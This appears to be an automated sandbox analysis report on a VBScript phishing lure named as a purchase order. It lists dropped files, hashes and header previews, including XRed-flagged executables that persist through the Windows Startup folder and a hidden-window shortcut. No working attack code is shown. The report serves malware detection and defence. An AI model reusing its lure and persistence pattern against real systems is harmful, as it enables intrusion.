                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AF5OyVj-3CI_myMz7kxk9g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\szoVUzZ.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.260644988142168
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+07ZDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+WZD+pAZewRDK4mW
                                                                                                                                                      MD5:29BDE675B328C8532164F5BCC764EC08
                                                                                                                                                      SHA1:843D2AB66D8B63081C51E0FD5DDF9C9F319C2E49
                                                                                                                                                      SHA-256:825A41B105B0E13706E2B61A397104D32E5D074573508BB625AF2BD6E5CA9151
                                                                                                                                                      SHA-512:B8355C9070915578B747E2B925DC925E936A463DCE15AB45653AB272D5D128EFC6D2E5DE15A49D9034E3C32A952B45D9655C062F97AE685C9E3E965E0950C904
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rUIliZNXdldQiW3ryBWX0Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tWHjuiH.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.271631658895326
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0jnSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Y+pAZewRDK4mW
                                                                                                                                                      MD5:7B3FD6CCCC392A7FBAB60A3DF0F63848
                                                                                                                                                      SHA1:C8B0E4F6409C18D179A1C32B37E0C60260052104
                                                                                                                                                      SHA-256:13629A6A05E6979576CA465E7302EC6DB6C548F0255C0CECC465121974FB8A62
                                                                                                                                                      SHA-512:929DB0CF94947860868E606BC5B683D71639E5EC863FC6E78F58C1207B7A3ACBC6F7E81D375FCF44EA597190B5C37C3133EBE530471C071CD0DFE814D0101D89
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PViCS9hrRPJMkqe2msZGNA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\uvpPtB1E.xlsm

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):18387
                                                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\vOqprrV.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.266298763619996
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3+pAZewRDK4mW
                                                                                                                                                      MD5:C8752C998D51F5FD8267829BA97DD0AE
                                                                                                                                                      SHA1:78570883B0B912234C3656C8CA6B61DB1524D416
                                                                                                                                                      SHA-256:207466561FAFBD9DC9CF6585A9552F024CC75046173546BABDDD567E3297CAB2
                                                                                                                                                      SHA-512:1E724874E7334154DCBB664E70CAC4A6AE8269FB6E3E143B26B88D776E63B647F85866D1B1D196F13A1212900054A3ACD0796DB22A9F4103C2BD3F415D8BC0D1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UlBVBLXhNGBco0JX0YpviA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\vbEUVKC.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.267551682315597
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0hDcSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+sc+pAZewRDK4mW
                                                                                                                                                      MD5:02AB1BCAF53054E457084C73C9BA76F1
                                                                                                                                                      SHA1:84AA8A95DD78CDFB6373C5EFE09A0B6793B0E456
                                                                                                                                                      SHA-256:043D52787896F34F7EEEF0976D7F21B494EFC00A46A01F054D093F4F03E825FA
                                                                                                                                                      SHA-512:CEBACC862A9A84AD3065A1B6207336D8DA81FC53BD7CBE83DEE963778E8CB332C46B1CDFB92505CA55FD319E372047C4C64BCAE6871110DF91DA4B0AE169629B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ej7XNwMIgG56sEutUc64OQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~$uvpPtB1E.xlsm

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):165
                                                                                                                                                      Entropy (8bit):1.7769794087092887
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                                                                                                                                      MD5:37BD8218D560948827D3B948CAFA579C
                                                                                                                                                      SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                                                                                                                                      SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                                                                                                                                      SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF16C6BEDBEDB6C577.TMP

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):32768
                                                                                                                                                      Entropy (8bit):3.746897789531007
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                                      MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                                      SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                                      SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                                      SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1217536
                                                                                                                                                      Entropy (8bit):6.928149757710278
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:DXe9PPlowWX0t6mOQwg1Qd15CcYk0We15Ue7Okfn0ik9Ya0xMYPLAtF5WyNn2fQ6:qhloDX0XOf44e7JFtxAnWe2fxYBQ
                                                                                                                                                      MD5:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      SHA1:CE7D9083A3A7A5A7F627CF1CDC4946756DF3AAA9
                                                                                                                                                      SHA-256:7DF6C8D2B3479312E1E8BF177D58E7F69C11B932177F288C0FC0D2AEE2F869D7
                                                                                                                                                      SHA-512:A27903F33A6B7B6B003EE5CB80B7FF640EF24D1CA635CE79D15DE94F69E6B2BDC8CA3E6E699F130BBC9E6D629312CC48216624A6110CAA068C532AA9133646E2
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...+.cg.........."......P...P...p..@.............@.......................... (...........@...@.......@.......................(.$........G..................0.(.....................................$...H...........................................UPX0.....p..............................UPX1.....P.......D..................@....rsrc....P.......L...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BQQQVU.lnk

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:47:55 2024, mtime=Mon Dec 30 09:47:55 2024, atime=Mon Dec 30 09:47:55 2024, length=1217536, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1817
                                                                                                                                                      Entropy (8bit):3.4563110699752
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:83Jp299veuwfSwdXAyePoE2+s9T4IlwMb+JyJtm:8332911KS9LCr9MIlwJyJt
                                                                                                                                                      MD5:272DE199717A616C13F9AF54F8219599
                                                                                                                                                      SHA1:941E3B90F9BBFEBF08B60D548A275B10B6EE1448
                                                                                                                                                      SHA-256:BA12E3AD7BF1A244DD257BE3B5FE532A0452EB1D922E23F1E34E5D5E5A1E66D0
                                                                                                                                                      SHA-512:6B82449EBBDD675927569BEE975F31B2F82E3762D6EB3BFC3F49A0BDBEAD0526C754C6D0AB922342552302A91D75789CD954237025A56771C949FC22C25E4400
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:L..................F.@.. ....ODH.Z...vKH.Z...vKH.Z............................:..DG..Yr?.D..U..k0.&...&......Qg.*_......7.Z...8.H.Z......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.U..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.U..Roaming.@......EW.=.Y.U...........................4W.R.o.a.m.i.n.g.....V.1......Y.U..Windata.@......Y.U.Y.U....7.........................W.i.n.d.a.t.a.....`.2......Y.U .XNLAGO.exe..F......Y.U.Y.U....E.....................5...X.N.L.A.G.O...e.x.e.......d...............-.......c............Q......C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.X.N.L.A.G.O...e.x.e.-.".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll...................................................................................................

                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1989120
                                                                                                                                                      Entropy (8bit):6.934025794433937
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:8nsJ39LyjbJkQFMhmC+6GD9bhloDX0XOf44e7JFtxAnWe2fxYBQl:8nsHyjtk2MYC5GDxhloJfXnWbfxp
                                                                                                                                                      MD5:290A46D2614F4CE4F7AD75D2CEA2CE23
                                                                                                                                                      SHA1:CC9F762B21F649252881087B2FF56E88D4B5A6F1
                                                                                                                                                      SHA-256:7CBE965FA1278BA09C31E191C19AC1E2B52F940B656273872C805833AE03E276
                                                                                                                                                      SHA-512:2A6D87585971CF166D4DF1B2BCFE80A8B066D1CF4CBF646ADDF0735B62644AB5D9624B635AA1BA89B0B36107FD2899BEC2F95D6A55D2FAFF579272E1E758FE98
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                      C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1217536
                                                                                                                                                      Entropy (8bit):6.928149757710278
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:DXe9PPlowWX0t6mOQwg1Qd15CcYk0We15Ue7Okfn0ik9Ya0xMYPLAtF5WyNn2fQ6:qhloDX0XOf44e7JFtxAnWe2fxYBQ
                                                                                                                                                      MD5:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      SHA1:CE7D9083A3A7A5A7F627CF1CDC4946756DF3AAA9
                                                                                                                                                      SHA-256:7DF6C8D2B3479312E1E8BF177D58E7F69C11B932177F288C0FC0D2AEE2F869D7
                                                                                                                                                      SHA-512:A27903F33A6B7B6B003EE5CB80B7FF640EF24D1CA635CE79D15DE94F69E6B2BDC8CA3E6E699F130BBC9E6D629312CC48216624A6110CAA068C532AA9133646E2
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...+.cg.........."......P...P...p..@.............@.......................... (...........@...@.......@.......................(.$........G..................0.(.....................................$...H...........................................UPX0.....p..............................UPX1.....P.......D..................@....rsrc....P.......L...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                                                      C:\Users\user\Documents\CZQKSDDMWR\UNKRLCVOHV.xlsm

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):18387
                                                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                      C:\Users\user\Documents\CZQKSDDMWR\~$UNKRLCVOHV.xlsx

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):165
                                                                                                                                                      Entropy (8bit):1.7769794087092887
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                                                                                                                                      MD5:37BD8218D560948827D3B948CAFA579C
                                                                                                                                                      SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                                                                                                                                      SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                                                                                                                                      SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                      C:\Users\user\Documents\CZQKSDDMWR\~$cache1

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):771584
                                                                                                                                                      Entropy (8bit):6.632480030468604
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Igr:ansJ39LyjbJkQFMhmC+6GD9n
                                                                                                                                                      MD5:B50AAC59E97F3D38A19ACB9253FABEBC
                                                                                                                                                      SHA1:F44DA6758D62D39C9F96E18763DCA6FC858385EF
                                                                                                                                                      SHA-256:634238998B9CA21CE7558C5410FFD9D21E42AC069FFEB1B590EED99BAC7C1F02
                                                                                                                                                      SHA-512:B8B07692BF6770D1F67F5A9CCE809F9B20EDCA21E7480151D0FA35AC1CFC61CBA5953B0475CAAA3C4892860C0CEE287E689E50FC1727CE9533FD87A85DA820B4
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                      Entropy (8bit):4.4167221189794565
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:Ccifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNQ5+:vi58oSWIZBk2MM6AFBWo
                                                                                                                                                      MD5:B5E548C63C78C5FB614B40699BDFAF66
                                                                                                                                                      SHA1:6B24BDE0F9248C1A3F0D4B06B4EE40BE7F8BC52A
                                                                                                                                                      SHA-256:D60D66991390876071B0ACB2C003C9523D21527C021B4919D3909D0922E25A3C
                                                                                                                                                      SHA-512:95FC61CC13C86AFEC9158C3EA85535A6C595CFC5AE1E3A4C38886FE176399970106A3094598462C3D49D38EB26990832DE4DF9A15355F0C1EFA90658C71A0AFE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.N=..Z................................................................................................................................................................................................................................................................................................................................................*1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                      Entropy (8bit):5.478541184696458
                                                                                                                                                      TrID:
                                                                                                                                                        File name:Purchase Order Summary Details.vbs
                                                                                                                                                        File size:661 bytes
                                                                                                                                                        MD5:3f54630f2965d5cce0465f1e80bb9b18
                                                                                                                                                        SHA1:51384b0b125117f4a25ffc39de41390651593f7a
                                                                                                                                                        SHA256:c0ef8a963ad2dae97f7277def4b571d5fb03270d46e640282ec806ca95d3b874
                                                                                                                                                        SHA512:5eaf076a7ab1544e0277b8465c315727840df8160c6b32c17ba272b808c42c910e77ae5f8d59eb0b8f07dd157171f0f02acf7b097e5f820ab2ed07db47a3154e
                                                                                                                                                        SSDEEP:12:qN5PhSJMPwAbs1vWdEV7wsjMG1oBHSDREJkfbycmspeHJ5xOTt4vPsiajFmrMvu/:kBAMPzbs1AwjMG1UHSDyJkDyzvx24XsE
                                                                                                                                                        TLSH:F401621ED803C6B94D3073B08F532E58E9E3E884A3BACB210780C07F9990B123C141E7
